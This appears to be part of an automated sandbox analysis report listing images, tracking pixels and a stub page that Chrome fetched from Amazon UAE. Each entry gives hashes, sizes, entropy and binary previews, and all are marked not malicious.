                                                                                                                                                                                                                                                                      MD5:F251210BE9F01B8F803C811CAF716BA2
                                                                                                                                                                                                                                                                      SHA1:FA2B8B5DAD1457B4E16D9F1E5C8165F7C3C67020
                                                                                                                                                                                                                                                                      SHA-256:BC80F49E1220A06CF13E602AF1F842E1A69A9C3B31C9FFF53965E3859A6146AD
                                                                                                                                                                                                                                                                      SHA-512:328E287ED041388FF69D7247304BE5876F0A41017CC2008B1954B3AC63AE0F4A3F3ADAB2057390DEE98EB97A9A3C4084D004B7C4FA12B77A23AA40BF66ACE9EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71AigHiXprL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......<.@.."..........6.............................................................................@.bs.O.M`..I......n..~w.$E...!.-{/4.................#...*..kz.cW.C..K6K.u.tuk......c...`5s-.{2...y...m.6.y.q........~h......y.....oEKC......WE7W.Dg..m.......)..9$....k....=...Ac....[!.7....E...}..m..Z...:..NR.Jr.....7...7X...4.....u...k.b."K].5..5.5...nr....'I.o[.QN.9....F.Z.z.d....5.9.7.Il..({......>vT....:../9T.F..8..~.n~X..Fr2N0.?wc.={.....w!.!.3:\.m..n.6.-...!i.j...Dn.....;_qfz.qI.U/......>......d..f.*..%P..y..~..a..s....B&V",...b..2.nnk...[...j.,...rP.msg..T..O....}H....F...K/..K.k.v..<....s..v.".g..4..SZ.....2......0..~..Q..I.<.*..\..q2.k...H.|9..5+.'#].....K.Wi.......~..=.b.....o5.N9.)......7..@./T.0..+..loR.....(6~..\..(A.BE.u.....L:.....p..4U.....%....Y.......P.-..U..Y*...;....V.tca.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?rid=RP6015S40NY7Z1AX6ZEM&sid=261-8635865-4706955&rx=CX1aSP8gevvfApf7TpgBcQ
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):22580
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950920212016055
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1Hi5BCbgEVZmf77tICPCj5blY6kg4WNVHTr/qLbAFF8sSebiqpAncNY6n3RIFE8J:1H/bgKZmf9ajtjkIHS4ssFbiquwnn3R4
                                                                                                                                                                                                                                                                      MD5:C6E265540102A513CC86F19209B2828A
                                                                                                                                                                                                                                                                      SHA1:D827D610A62BDD1219F14D37984DC17CF9B1A113
                                                                                                                                                                                                                                                                      SHA-256:DD82410C41CCEF9AA847A04D2FB7953F7A0DD12E81E34FD79CE3D7EC74AE2433
                                                                                                                                                                                                                                                                      SHA-512:B17B77D76C3DC08BF0982BB7D1D623C3CD1647E901AFB9A8DAE5F51502AD06D164EA5B8255A83AEC776914D25F2696D42B2658913973D022B100E63F9F08D898
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."........................................................................................y...i.w9..............j8./.. ................5.G.............P...C.d{..y./t............k'..}0..a.......D.o......B...e..d..;g.]..................j9M,h.7.U)O4..]..K.a.|.........q....Qt .....;W....L...v\.&..V.6.>.M.3.g._..E....5..'..n..x......?!.....4:`....zL.2B...........................]...G..s...icl...l..>.6m...r]...R5.;......~F.......O..C..D..C...|M4:.Pe].N..#..z.0......\.....P...{...tn;...|...J)..$W.>.}.@.\..|.g3.]tjR6...q.f.....x.!.p"f...QJr..k.]..y/.=.`.i.C....."u.E..K..>...............K`y.\W..m.-..uc...`.....MlL......_.rUP.......~....-...n.m.T...#_\W.U.1q..G.Ce.....q.?Bu.T..8.........qk.ZO..s.V...F...u.5v.....]>.-..mv9.{.kP....=.N.....#.{.F..n...o.{.Q.....yu.8.tR6..;....;.|?......T..........gb.vkr#.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):42516
                                                                                                                                                                                                                                                                      Entropy (8bit):7.927193138939699
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4Yy5zL1VwfaY7ILUMrgJmX6IwDDQMT46ag49CLhirrPprSZWzVpGbZ:45EsUvdVp46J49ClKpmqp+
                                                                                                                                                                                                                                                                      MD5:E0C253CC959F9A4ADD2BF71A8ECDCC51
                                                                                                                                                                                                                                                                      SHA1:77BF04DAC1A43E45E8774E30FC81C8B125FC68F2
                                                                                                                                                                                                                                                                      SHA-256:10225D5C26E9C96D0CBC1E632A32E98FCF21A6489FC23CFD2701F8DFE4B109D3
                                                                                                                                                                                                                                                                      SHA-512:4F4368D7A3F084FA4D31C41416CF5B3E5109FFA9E9A4F28F3491167252744660613B6B92E5330B2CFDE616E02E2A33489B8D465453B5FF10EA6029C3BA922475
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_OHL_BTS24_GW_Bubbler_Fresh_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):35596
                                                                                                                                                                                                                                                                      Entropy (8bit):7.941288835371088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:pzRXfAa+m5dHEbmLPtOf3MQ7MR+zBaFFFF6hP/pVtY:pNI/wd6mrgpQRY/rtY
                                                                                                                                                                                                                                                                      MD5:17452E64B4503CFDFE0A4D5652794CD0
                                                                                                                                                                                                                                                                      SHA1:62993F6159E6CCD43FF86D3089DCA01BF80551E2
                                                                                                                                                                                                                                                                      SHA-256:B7C4C7120BC386D2984CBB1B59257B7150108506C327DBCE5EF0110098A2154E
                                                                                                                                                                                                                                                                      SHA-512:834CB3C65302314673E6E125C5EC3BAFC79B31636A318B5F8C42CBE634D58A7E5379735A66588D726F46555C4176DCF0276DD18B12EC3ABA5786062629B857DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!1.."A.Qaq.2U.....#BRbr......37..$Ccst.....%68DSTu.....4Vv...5E............................!..1.."2AQRa.....Sq......B...#34br..5C..$%..c.............?.....P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...........P..@(......P..@(......t.zP.....T.......2....{moW..D.+.).{Yv.#....N,Y.\.Gh(yL..\W.*i.....RT?R..w!......w....CW../.Q.O.@.%6.8...rL.......nin)}.....#6..}..#^..O].H....>[Yuj.V....P.v.;e7.^.Tt-.....F).?q5.qe..qX?.U........)x....G..Uq.j.....P....j....~....%.=....;qI=oa^.....".{.....G......]....M..K.......6.nS..FK.?.....G.f"v..M.&[m..:.!.~~.C......+..k.....^.%..l....TBn.u...9.J\......k*.*_r.~........v}..-}..qq)L.2m.W...#?..t}5...L}=.O._....#...K..lov.U....-.$..........8.....P..%.Z..]R.J|h.e.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3Asi%26si%3D27099%26pc%3D49221%26at%3D49221%26t%3D1724264968415%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19950
                                                                                                                                                                                                                                                                      Entropy (8bit):7.951155319622423
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:BC5ET7WkTUS7mosmsTV2lTpiXlAxbwZPaR1gPwg8AJWtvzz:bTqGVGLTVuisbMPMgn5ctrz
                                                                                                                                                                                                                                                                      MD5:67ED8610640BA7FCF50E7E74A940AACA
                                                                                                                                                                                                                                                                      SHA1:D2BFFE2C3815F515C9A029797B4D75BC0AF09BD0
                                                                                                                                                                                                                                                                      SHA-256:231F9317A6A34DBD6DA139D18BE2F63EE3B08B13941181B23A02876FC02F8E34
                                                                                                                                                                                                                                                                      SHA-512:B1E548B1F081B52A84B9DE95AB644E4C264DDA0FFCC0E026D01D5064A6BDE8FB427DF46ADB096F3F26B30AB428FABB6E7063F88CD6A745B91D402B18D3EB6A8D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................X...........k!.Z.l......k*.9.F.k....l..9.F.k.......<............<_....J.6.22JT..J..$.:..<+.....i+.U...9.k...W..:...9...7.l...6..........xOH.-7.....\.R.IJ5%(H.e.J2%(.2.&Vq..(L.'.$+8L.'..K.....C.j.p................;...k.J..YR.e....a)FD..&..|......~t.B.\.8e.T..E...}.^.yM...S....^X..g.G..[......^_....;..L.8................ZT.iRR..J..."R..^N>BR.N....D..sK.G<..\J.e.%.*n'o".v..y-y..KY.\....k2........OUygie.D.}....i......k.J..Z......a)FD...S..J..Y.........._.f.o.3Q.3Q.3Rp.j0.j0.j0.j0.j0.j0.j0.g........;l...t..G.....t.........ZT..S.....%(.."\.rL...]ge...)..>............=.......{.}:9u..<......9..k...IV.%{c3*...so{..7.t'...=..{.yf......h.\........xC.....u.gzW..P...z.o..C.....%X.c"U..N....Y.....G.].u.y.S._.N
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):27489
                                                                                                                                                                                                                                                                      Entropy (8bit):7.968573607984877
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1hBsScZLo5b3w8UA3oQ98RtlTGjaFU+ufLZyCz0C2h9o:5sSclo57w8UA358jlTE7DLJ00
                                                                                                                                                                                                                                                                      MD5:6175CD90D629B20DBF55976692D2E378
                                                                                                                                                                                                                                                                      SHA1:1B703B8AF62F24304C426672D71BCDD207CB509F
                                                                                                                                                                                                                                                                      SHA-256:60E0B2E760F4CD700B36F40EDC6434FBFCF6F5F5C61AC8F7A7004386D507A545
                                                                                                                                                                                                                                                                      SHA-512:B6CCB850666CAF1D7BC7185C2826DA156C29AE8A9DC845AA06CD70D0EB201E319239D04718349C7D9C8766F45777F7ED019EBF2EB3B03AF0E96386B0699815A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-Combat-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................h...[..5.*..(.s...L>q._.u$q..cF.....lrit}.u.z.....U.=.F..oas.....#.6..F.Q.<.&...A..y....k"dp.qx1"..E.......Q.....hK.Q.)tv.#..X..S..<...4mH..y_...(..5...&.(...[.Q.\...k.....D.....8.c..DF.X.....[....U.K.....U.....k..+.......O..$R........_,.8.sOiH.a.K..%....Q5.F..E..clo...V6..s.$.....\...?K .:J.....h..M.lO...5\.I-.......D.G....I.1G.#h.".<.4.Mn.}QA^.I-.y..G....qDG...E.C.Q....TF.<...M....s.|....u....ej.A.z....(...h.........,..I.5.k;..#..d......7E.1........5...m..y.,..z....'..s..=../^...{..!.(...@...lSln.F:{.K$.N....^:.3.g..s./W.M.(......D-.;.9.7.+.<.I$......x.xk..y...n.:..a..1.A..[.v$S..6.K+.$..s;;.........wQ..pt...Q..h.EK~N..cc....#...$....!.Z....!..y.~.n8adl...".<.....ErI$p..$......Y....[....t.0..#dlA..\.6+..%..@t.=.^UE.422...5.z..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5275
                                                                                                                                                                                                                                                                      Entropy (8bit):7.917296514839111
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:wCcHLsOLiRitCaOA08GEMrgtCtjrQpv8k3Jm09h1pBONbd:wCcz2RitCaJDJMrgt+jrepJN9ZBI
                                                                                                                                                                                                                                                                      MD5:A6C6196D221FFC0A62C7E2E5FC18A3BC
                                                                                                                                                                                                                                                                      SHA1:49400C57FA4E3A1C4CC65F51CBBD51BEFE3611E9
                                                                                                                                                                                                                                                                      SHA-256:BA134B3F255BE47389B72F2E91CDB00AB1FD57D4B35DDD72EFCFBD07F386CB59
                                                                                                                                                                                                                                                                      SHA-512:2D3AAB1B6F821A58DC2273767B19D53B38978C6F50DDD0F3EF08B800E6C8E3143804E022D2CD7CD02ED97CAF7F776B42E1D102122409B9F51496F99A112D06E2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871139_186x116_1X_en_AE._SY116_CB569183660_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................%... ..#.%.%$$&)*%.)8...........#...$...+$*.$&$$./$*#$.%$. .....$.&&%..&#.2...$#) .&-......t...."..............................................................!...1A.2QRa..."q...5t..#$4BSbs...3T.r.....................................................1.!a.Qq."#24AB....S...3Rr...............?.j.E..+.E.QHO".....U$.H.c.V.EE.o..T.......m...IP2.Rp...+......& \.`...s3.{...L^....X.".k|...H..M&WdR.....N.....]B)..F..c..O....czz....Tue8........!....*.n..$..?..5,tD.5.K.n.$9h.o..7K..z..#2.h.c. 8..I..c.c^*z.>..M.R.=>b.s.6.%..m...Mc.....5.5(k.G=....c.c p.hm.......>...[H..K....|.4...}.6s`3....X.l.g2Lv.....L.{.._.G.o}.k.jy.......Hc..s.o.|.Si..}n...x.}B2|.b~%..{...h..$....O.6Q_.o}.k.k.Vm.....7.`.C.....%dV..9...$Z....D."]..(U.N."...c...T..N...^.c.A.'......m...M..-.......7..m..d..."...0....bQ.0....W..8.%..n&=..h.....).dzv..Q..ko~O...c.C..,y..a.n..*-.W.....~c]?..-~#-Kk.\..Z.fF..Y&.......r..JY..y.]
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2649
                                                                                                                                                                                                                                                                      Entropy (8bit):7.802966138392855
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rmQc1jbaUkoEwLaUOxTlTcrL3iYwrcOWmcViY2u2QMsscyEKFf:TFt7EwLajxtMuYmcOzxu2QMWK5
                                                                                                                                                                                                                                                                      MD5:49B8BA12EA2FD2FCB8CDE5CEB044255D
                                                                                                                                                                                                                                                                      SHA1:8C6534745142D6C4F4A1F9A7DCC6AF1EC2DA389B
                                                                                                                                                                                                                                                                      SHA-256:C9B1E0CB1BE75194CA37F22F383DD8D515153B8BC13C288595A112E6DCC7A292
                                                                                                                                                                                                                                                                      SHA-512:F000E323A2793EB54FCDF0284326CEA080E45161BD83166737AB1AF4D16EDC63D328B8436E8C00EF036680FDFB2013B3F5DCA0C7B4148D512998A11F2E87A2F4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!Aq..."12Qa.4BSr....$3R......%6Dbtu.................................................1."2ABCQ............?...." "'.......qN..9.76...w.1...7..X......q.c......n...=....$E....t..}.q..K..~.m..y..q...i9........v.bw%.....zg.h.....3m.M...9=.-D.?.-.4.D..{.........6...""." ""." ~=.J..o.Z.6...;}.f.\]et.8....Q..C....,.....K..V.K.&5.}q.......<.rr..M.3..e.].v.K.+.r..U.j.G...t."..Y.|{+]......"O\...=.............Uk(...U....V..F......7h............#"..l....z|.j....m...0.~G..V'..............<Qb..~..6.....i.W...0p.V..l...s....]Kr.d-..'>.j.......{]=.....g..U/oE..v}..fIh|)...u.9Z..Z....z..^.}._U...\=...;U.Gp...x..m..j.:..np...9a*...m.).qJ.)-.".Z.ns..L.\..m2..m..;.....>..i..+0.....&.fY[w^q.5$D@DD.D@DD...fy..vG...M6..Vc:.>e.`...X....Z.....N
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):37419
                                                                                                                                                                                                                                                                      Entropy (8bit):7.937127031508407
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8o5vu1HQZYJ6tT20eEseZDurX/U7+Y9eYe7axwIlR9q:hmK/lseZDu7UmYe7aSWRU
                                                                                                                                                                                                                                                                      MD5:C2B2663B7B307CCF7E78A827952EE635
                                                                                                                                                                                                                                                                      SHA1:A8895D0213035F00116B792274F7AB66B7DC6BAF
                                                                                                                                                                                                                                                                      SHA-256:1B1EE3D875ABFA85284B12CC7F1DE4F265E16E45C8F7A7C385FD1C2551C2F23A
                                                                                                                                                                                                                                                                      SHA-512:1E5B0A2A21FEF7C1F261DA3BB534974B2BA5AA48E5FDB4C54E33A4366EA02CE3AABF65532E5F700188800ACB66267C1ABEF64C3C3D115AFEBD2D46C4A8D1942F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51YnNha37vL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E76D9EEB4FDB11EFA1089C0DB44280A6" xmpMM:InstanceID="xmp.iid:E76D9EEA4FDB11EFA1089C0DB44280A6" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="BAD84EA065AEB6F4371E8144F077EB94" stRef:documentID="BAD84EA065AEB6F4371E8144F077EB94"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................... ....+!.$...2"3*7%"0....................".........................."...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3773
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8580841128368695
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:aHHwIHbIfSQ/iCzxqw+4fLVBggTFoc1SHHklIFN+k:s7E/VzEyuPcgklI79
                                                                                                                                                                                                                                                                      MD5:AECFD0EAFC60CCA7E0CE9706F5A567B2
                                                                                                                                                                                                                                                                      SHA1:0023340DBEA1F5B5510BB37F1A08CC9AE5AD3469
                                                                                                                                                                                                                                                                      SHA-256:46FA74ABB04D54AA2CBDE8E305C1155303F3135A5AE018140A4D150D41E6F788
                                                                                                                                                                                                                                                                      SHA-512:ADD6B649580963B8FA776BC1F8415A75AC86A8A64B822C080C65E455F0524A136EC2106DC56412E5DCF24670DDB147B2BDE4FC45D72752D6F3EFA34B5D0E6311
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:........................................................#"""#''''''''''..................................................!! !!''''''''''..........Adobe.d...........t...."........................................................................................!."1.AQaq.2B.#4brt56Rs......$%3...........................!..1AQ."2aq.......#BRr.34...............?..Q.t.$...DD....D@...DD....D@...DD......Q.t.$...DD.V.,..4..\..W.z..#.....3.EYJ...../....X. }...?..?.,h...{.l..ggz^.Sc{][..g.o...2O3.............t.c].{..Y`2..W;.9o"......{.|h...I.....,na..<9.s.{...=.R...4*..c.......QjV...pQr.k.K1..p.R;\..)m.Jf._lGb8X.2..s....d|...~..+.......C=.:WY.....{....-...IU..kF..8.~.....Yw.5...~.....`.x&)..n><\..%.w.--.J...ni...SR..[p....5.$q.........#..c..7...v....l.....K...78.}...U.....M.6a=sb...9."V.a..j2Z.7...u#.>W....0.&.......>..M^...d...R...+.f.x<_.Y.w...h....N.!.P..3>.^X9.`.*.$m.s.].I=.[."...^..L.....$..:n......z:.uG..}wG..k.....;./w..xU.i...vZ...m?..F.H8....r.>.JRm,e.'B.#Rv.Q..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8327
                                                                                                                                                                                                                                                                      Entropy (8bit):7.737215838786652
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ePwcly0XixCa94KxYpCXcZ+7YH9icDVXfdCACtpP2dUClJ:r6XQB94K3D7YH9RDVlJIMdU0
                                                                                                                                                                                                                                                                      MD5:0ED4C8CAB7485BA7C52ADAB0109CD52F
                                                                                                                                                                                                                                                                      SHA1:BD0D412BE62B3F4890CC3A3F54CC6AA5505B4EC3
                                                                                                                                                                                                                                                                      SHA-256:3FB55228D8FA31E9D5B8416B2141206E8CB051BB2FC9EF6EE3A1EE5C13649635
